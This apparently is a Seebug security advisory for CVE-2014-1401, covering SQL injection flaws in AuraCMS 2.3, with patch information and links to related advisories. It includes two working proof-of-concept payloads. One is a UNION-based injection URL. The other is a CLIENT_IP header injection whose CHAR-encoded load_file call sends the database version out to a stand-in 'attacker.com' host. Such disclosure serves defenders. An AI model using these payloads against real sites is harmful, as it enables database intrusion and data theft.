Lucene search
RootSSV:61392HistoryFeb 08, 2014 - 12:00 a.m.
AuraCMS多个SQL注入漏洞
2014-02-0800:00:00
Root
www.seebug.org
22
0.003 Low
EPSS
Percentile
66.0%
CVE ID:CVE-2014-1401
auraCMS是一款基于PHP的WEB应用程序。
AuraCMS存在SQL注入漏洞。由于在程序SQL查询使用之前未能充分过滤未明的输入,允许远程攻击者在后端数据库中注入或操纵SQL查询,允许任意数据的操纵或披露。
0
Auracms 2.3
厂商补丁:
Auracms
1月30日后更新的Auracms 2.3版本以修复此漏洞,建议用户下载使用:
1.The exploitation example below displays version of MySQL server:
http://[host]/index.php?mod=content&action=search&search=1%27%29%2f**%2funion%2f**%2fselect%201,vers ion%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
2.The exploitation example below displays version of MySQL server:
GET / HTTP/1.1
CLIENT_IP: '),('',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 ))))) -- 2
Related
packetstorm
packetstorm
AuraCMS 2.3 SQL Injection
2014-02-06 00:00:00
htbridge
htbridge
Multiple SQL Injection Vulnerabilities in AuraCMS
2014-01-08 00:00:00
zdt
zdt
AuraCMS 2.3 - Multiple Vulnerabilities
2014-02-08 00:00:00
prion
prion
Sql injection
2014-02-11 17:55:00
securityvulns
securityvulns
Multiple SQL Injection Vulnerabilities in AuraCMS
2014-02-11 00:00:00
cve
cve
CVE-2014-1401
2014-02-11 17:55:00
exploitpack
exploitpack
AuraCMS 2.3 - Multiple Vulnerabilities
2014-02-07 00:00:00
exploitdb
exploitdb
AuraCMS 2.3 - Multiple Vulnerabilities
2014-02-07 00:00:00